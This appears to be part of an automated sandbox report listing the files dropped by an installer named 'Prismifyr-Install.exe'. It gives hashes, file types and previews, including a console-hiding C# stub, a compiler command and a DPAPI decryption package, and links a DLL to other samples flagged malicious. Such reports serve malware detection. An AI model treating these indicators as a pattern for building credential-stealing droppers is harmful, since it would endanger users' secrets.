                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):312
                                                                                                                                                                                                                                    Entropy (8bit):4.810180533274889
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:V/DsYLDS81zu+VMOhMLL+iNFs2SRaiP2hM/siNFs2SRkoSoODxLhy:V/DTLDfugMa7I9Ox1y
                                                                                                                                                                                                                                    MD5:ECBF151F81FF98F7DFF196304A40239E
                                                                                                                                                                                                                                    SHA1:CCF6B97B6F8276656B042D64F0595963FE9EC79C
                                                                                                                                                                                                                                    SHA-256:295CA195631C485C876E7C468DDCBB3FE7CD219D3E5005A2441BE2DE54E62AC8
                                                                                                                                                                                                                                    SHA-512:4526A59055A18AF6C0C13FB9F55A9A9BC15AA1407B697849E19B6CC32C88EE7206B3EFFF806BD154D36BCE144AE1D9C407C6EA0F5077C54FBE92CD172C203720
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace Console.{. public class Window. {. . [DllImport("Kernel32.dll")]. public static extern IntPtr GetConsoleWindow();.. [DllImport("user32.dll")]. public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);. .. }..}.
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                                                    Entropy (8bit):5.225543378112513
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23f1Tkzxs7+AEszICN23f1TXGAn:p37Lvkmb6KmtTkWZE7tTWA
                                                                                                                                                                                                                                    MD5:6E85450A033D01432DF4C1E6A27CCA6E
                                                                                                                                                                                                                                    SHA1:367248DB29CCBA79CC149408E55060421F4D6C35
                                                                                                                                                                                                                                    SHA-256:DB5A9801A52B1345C199861839C5CA4ED0A7A079E1D2BCD6E5ACC1C27BC84AA0
                                                                                                                                                                                                                                    SHA-512:0F17F2F772C40719D04D396FD9B52360CC5E152CAB6F94E2344C29653BF6B2463E384DE3763E920560ADFE744C7E6475FF11C6D46A706C9C41C6B46DCB818CE6
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mydyhibp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mydyhibp.0.cs"
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3072
                                                                                                                                                                                                                                    Entropy (8bit):2.8319200318853803
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:etGSspeYYqql78G7v/SZetkZfG9XRFWI+ycuZhNWakSePNnq:6DYSlIqvaZRJG9XK1ulWa3Cq
                                                                                                                                                                                                                                    MD5:07E0BB995511C02A51CE502AE8C5C20C
                                                                                                                                                                                                                                    SHA1:1FEC74A53E60ED71C4950C9024BE5A09CFEF62FF
                                                                                                                                                                                                                                    SHA-256:BEC8460724011DCFD201D920B23B447DA784EF0698D50BC33738440962198711
                                                                                                                                                                                                                                    SHA-512:CC762807940958A75676A8884E93112ECCFC9B964265BFA8AA301E04641AB6334DE62CE2E4E24B274FC6DF82481E59E7AA074901089C4FD75459B9FF6E798D12
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!.f...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....m.....m.......................................... =............ N.....P ......Y........._.....d...Y.....Y...!.Y.....Y.......".....+.........=.......N.......................................&........<Module
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (487), with CRLF, CR line terminators
                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                    Size (bytes):908
                                                                                                                                                                                                                                    Entropy (8bit):5.295234842332236
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:K/uVMyId3ka6Kmt5E7tAKax5DqBVKVrdFAMBJTH:yuRkka6Pt5E7tAK2DcVKdBJj
                                                                                                                                                                                                                                    MD5:06017535259849E2D758F2272650472F
                                                                                                                                                                                                                                    SHA1:454A75F0935B93334AFEA4E849EE3D9D2AB5374E
                                                                                                                                                                                                                                    SHA-256:1681EDAF71A7A200A45807B9C28AD48024720D15B815E191A619D06591D89A94
                                                                                                                                                                                                                                    SHA-512:A39E45EE51C9C60737A789D89F992E958563D1F1C2F28B2BC34515EF5182408E69038B2C1A481ADE23D1F25D00915834E3488577F295C5457622DC7861A9A6DF
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mydyhibp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mydyhibp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1090
                                                                                                                                                                                                                                    Entropy (8bit):5.138143400773255
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:7dDrzJHkH0yw3gt3DQJq1hBE9QHbsUv4fOk4/+8/3oqaFN:7ZHJMlUE/BGQHbs5JK/3oDFN
                                                                                                                                                                                                                                    MD5:7BD114B023FA6209FB7B02150A202CCC
                                                                                                                                                                                                                                    SHA1:4451515F9D7B16CE8983ABB4E85609FE4162C4D4
                                                                                                                                                                                                                                    SHA-256:455DDA47A3FC2F58AB06D8E526F490EC43D0FC23A5EA80DD0942644397316D9B
                                                                                                                                                                                                                                    SHA-512:87EE4DC1DA13937055EADE250F1F8A357F549C709B9659258C137009060080ACA5CFD979890A7B2D662083F4C646CCE9AF6E20774B58541AF9E712FB5F4F1C60
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:MIT License....Copyright (c) 2023 Xavier Monin....Permission is hereby granted, free of charge, to any person obtaining a copy..of this software and associated documentation files (the "Software"), to deal..in the Software without restriction, including without limitation the rights..to use, copy, modify, merge, publish, distribute, sublicense, and/or sell..copies of the Software, and to permit persons to whom the Software is..furnished to do so, subject to the following conditions:....The above copyright notice and this permission notice shall be included in all..copies or substantial portions of the Software.....THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR..IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,..FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE..AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER..LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2134
                                                                                                                                                                                                                                    Entropy (8bit):5.188690027016766
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:+nkuVlIJ6KdxdVAKNYe9HZ4/vhGr5vdDvILJeBJ+gv5v2B/B:wFPqdbVAKND9HZ4glvdDvCJIJ+gx+B/B
                                                                                                                                                                                                                                    MD5:4192E945D5CB3DDB6723DB777050DF23
                                                                                                                                                                                                                                    SHA1:3A3537AEC359C18C4DE93D7B6D6E9A78E81AEC27
                                                                                                                                                                                                                                    SHA-256:C0BCA603836FEC1E0CF69AC75BE8AECD89CF1234B646235D71CE8A5CCB41539B
                                                                                                                                                                                                                                    SHA-512:FC6C9BCD690B462EA1A3BB4536AE2FF4E058C82281CAABE9B53E3E36539B984C083B653907547D22AFEA88F9CE716105CCFFAD127F16F68BAF2C5CC2AA5AAEBF
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# DPAPI..[![npm](https://img.shields.io/npm/v/@primno/dpapi.svg)](https://www.npmjs.com/package/@primno/dpapi)..[![npm](https://img.shields.io/npm/l/@primno/dpapi.svg)](https://github.com/primno/dpapi/blob/main/LICENSE)..![build](https://img.shields.io/github/actions/workflow/status/primno/dpapi/test.yml)..[![coverage](https://codecov.io/gh/primno/dpapi/branch/main/graph/badge.svg?token=J4AVWIOR9F)](https://codecov.io/gh/primno/dpapi)....Native module to encrypt/decrypt data on Windows with DPAPI.....This native module is **prebuilt** for Node.JS running on Windows. It provides the win32-x64 N-API module.....Based on the port to N-API made by [Microsoft](https://github.com/AzureAD/microsoft-authentication-library-for-js/tree/dev/extensions/msal-node-extensions/src/dpapi-addon) in @msal-node-extension from the work of [Brad Hughes](https://github.com/bradhugh/node-dpapi).....> This package is part of the [Primno](https://primno.io) framework.....## Why this package?....Other similar pac
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):938
                                                                                                                                                                                                                                    Entropy (8bit):4.56459448583227
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:L0A5PYDW5BmdYSAWmU5/MNeNCRmO7HGH5Ch:L0oyGmdYXUqZHg5Ch
                                                                                                                                                                                                                                    MD5:91D941775043DF9C39DE968E43D95E3B
                                                                                                                                                                                                                                    SHA1:FD881A43CE443F0EEDFD11D595EB47F873D0E083
                                                                                                                                                                                                                                    SHA-256:D093676FF7F72B93D21CD1CB809167AB2198868F990EAC8AB7DD4D196F33F18D
                                                                                                                                                                                                                                    SHA-512:BBD8019C300E68D951B97E3D2B3E3088B110EE318B150B39B4C8E374A1239F929F6BC17B131EF8321D8E68BA443F28C0119F4605A97AA4061B4F3195591C6DED
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:{.. "targets": [.. {.. 'target_name': 'dpapi',.. 'cflags!': [ '-fno-exceptions' ],.. 'cflags_cc!': [ '-fno-exceptions' ],.. 'xcode_settings': { 'GCC_ENABLE_CPP_EXCEPTIONS': 'YES',.. 'CLANG_CXX_LIBRARY': 'libc++',.. 'MACOSX_DEPLOYMENT_TARGET': '10.7',.. },.. 'msvs_settings': {.. 'VCCLCompilerTool': { 'ExceptionHandling': 1 },.. },.. 'version': '0.5.0',.. 'sources': [.. 'src/main.cpp',.. 'src/dpapi_addon.h'.. ],.. 'include_dirs': [.. '<!(node -p "require(\'node-addon-api\').include_dir")'.. ],.. 'conditions': [.. ['OS=="win"', {.. 'sources': [.. 'src/dpapi_win.cpp',.. ],.. 'libraries': [.. '-lcrypt32.lib'.. ],.. }],.. ['OS not in ["win"]', {.. 'sources': [ 'src/dpapi_not_supported.cpp' ].. }].. ].. }.. ]..}..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):411
                                                                                                                                                                                                                                    Entropy (8bit):4.666190815311686
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:4i27ahy+KX2qB+KX2NXQoH2o8pZATg6eQ8/:gmhyvRBvsXQZfAU6zK
                                                                                                                                                                                                                                    MD5:FEC85FA3A3A7565A40BAF3CE1BB3CE01
                                                                                                                                                                                                                                    SHA1:9ECD3B70EA677C149D32FF49179151647E867987
                                                                                                                                                                                                                                    SHA-256:CB781599F1FA516E89E70F9CEA142FBE35DF7E42E2B48CF499839B8A23E203F4
                                                                                                                                                                                                                                    SHA-512:D3633D143FA7DFF7048AA9ACAEDB73171D5222828FE56300CB57B4FF2AD6FDF576DD54D3D757F7B83F9AB639C26ECE6044882A7BD66B4AC293D0B32559CDE56D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:export interface DpapiBindings {.. protectData(dataToEncrypt: Uint8Array, optionalEntropy: Uint8Array | null, scope: DataProtectionScope): Uint8Array;.. unprotectData(encryptData: Uint8Array, optionalEntropy: Uint8Array | null, scope: DataProtectionScope): Uint8Array;..}..export type DataProtectionScope = "CurrentUser" | "LocalMachine";..export declare var Dpapi: DpapiBindings;..export default Dpapi;..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):412
                                                                                                                                                                                                                                    Entropy (8bit):4.988449972336118
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:KUDQh5ACDQHS9NETNwQQ4FaCCOQQ4FQ0aE4QHR:KPzZMHS9eRwQ91Q9ydE4Qx
                                                                                                                                                                                                                                    MD5:0B33E83D33B01A51625A0FDCBEF42CE3
                                                                                                                                                                                                                                    SHA1:1C29D999FF7DA39426B97F2EB31A3D83DB8F5FC7
                                                                                                                                                                                                                                    SHA-256:A7FF0225CB5EBCBEF8499C6C8AC2BE924F584EB375DACB1D8BD3DC6540B510F2
                                                                                                                                                                                                                                    SHA-512:1D04CAF4FC2E876BDF2A089AE938A41FE4D3F2928AA846709BAFD2DE236FA8C754FCC84D7E8A5F5734BC1CECC04B395AB9D2114945B35E8C85CD3B9EE8F9799C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:"use strict";..var __importDefault = (this && this.__importDefault) || function (mod) {.. return (mod && mod.__esModule) ? mod : { "default": mod };..};..Object.defineProperty(exports, "__esModule", { value: true });..exports.Dpapi = void 0;..const path_1 = __importDefault(require("path"));..exports.Dpapi = require("node-gyp-build")(path_1.default.join(__dirname, ".."));..exports.default = exports.Dpapi;..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1361
                                                                                                                                                                                                                                    Entropy (8bit):4.800291506989356
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:p1khgCh5sGtilUOjWblPINkWUaeadrb7bRdcrNlDCQ/tH52FkP:bSgCF3OjtF/drjRdcrNxv/tZ26P
                                                                                                                                                                                                                                    MD5:2F21C3A26EC0B7AA14918F7347428F40
                                                                                                                                                                                                                                    SHA1:DC0DC2418A4197EB605501D1F95DA5B9D8B655E2
                                                                                                                                                                                                                                    SHA-256:34F3EB34FC4F852B4D68DBFDC1DDE831467BC8FE2B4280C50453EFB56444078A
                                                                                                                                                                                                                                    SHA-512:49F6C54A80A4EE476127A2D5C89C5722257DFBC21CA241E6502FF2CD858A59FE16E5993188ACB57C3802C3DD0A67D007323105B948082806FAD58AA6360AF9F4
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:{.. "name": "@primno/dpapi",.. "version": "1.1.2",.. "description": "Pre-built version of DPAPI (Data Protection API of Windows). Encrypt and decrypt data.",.. "main": "dist/index.js",.. "files": [.. "dist",.. "src",.. "prebuilds",.. "binding.gyp",.. "test".. ],.. "gypfile": true,.. "scripts": {.. "install": "node-gyp-build",.. "build": "tsc && npm run prebuild",.. "rebuild": "npm run install --build-from-source",.. "prebuild": "prebuildify --napi --strip",.. "test": "jest --coverage".. },.. "engines": {.. "node": ">=14".. },.. "repository": {.. "type": "git",.. "url": "git+https://github.com/primno/dpapi.git".. },.. "keywords": [.. "Dpapi",.. "Prebuilt",.. "Encrypt",.. "Crypt".. ],.. "license": "MIT",.. "bugs": {.. "url": "https://github.com/primno/dpapi/issues".. },.. "homepage": "https://github.com/primno/dpapi#readme",.. "devDependencies": {.. "@types/jest": "^29.4.4",.. "@types/node": "^18.11.9",..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):140288
                                                                                                                                                                                                                                    Entropy (8bit):6.055411992765344
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:94PTD6FEzMju6bzJKjpEPeTOKvJhEnww+YbRYvPuq:94jQju6b9KilKvJurR8W
                                                                                                                                                                                                                                    MD5:04BFBFEC8DB966420FE4C7B85EBB506A
                                                                                                                                                                                                                                    SHA1:939BB742A354A92E1DCD3661A62D69E48030A335
                                                                                                                                                                                                                                    SHA-256:DA2172CE055FA47D6A0EA1C90654F530ABED33F69A74D52FAB06C4C7653B48FD
                                                                                                                                                                                                                                    SHA-512:4EA97A9A120ED5BEE8638E0A69561C2159FC3769062D7102167B0E92B4F1A5C002A761BD104282425F6CEE8D0E39DBE7E12AD4E4A38570C3F90F31B65072DD65
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                    • Filename: HogWarp.exe.bin.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: ArenaWarsSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: ArenaWarsSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: WorldWars Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: DungeOfDestiny Setup 1.0.0.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: Game.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: Game.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: OmteV2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: voicemixersetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L..............C.......C.....C................................"...C...............................................Rich............................PE..d....-!e.........." ...#.>..........XG....................................................`.............................................X.......<....`.......0..$............p..........p...............................@............P..........@....................text...`=.......>.................. ..`.rdata.......P.......B..............@..@.data...............................@....pdata..$....0......................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):206
                                                                                                                                                                                                                                    Entropy (8bit):4.938751852143238
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:UIcKVmDD9jmKXVM8/FAJoDaqytBKuFzdrGIAj3Mqbgv1Xiki9IJ9kLGKWADEJJ/V:UKiBXVN+qO9/rRA4FdiakLdWYMVHv
                                                                                                                                                                                                                                    MD5:EA1E5899EC0210D7DE4CE325D1D94022
                                                                                                                                                                                                                                    SHA1:464DA48D40547CB08A67A1ED38CB0AE8369F2F42
                                                                                                                                                                                                                                    SHA-256:18280B1135123AFF82FBF4188A5AADFC9A5D6FFFAD9309F72F347F380F2DA550
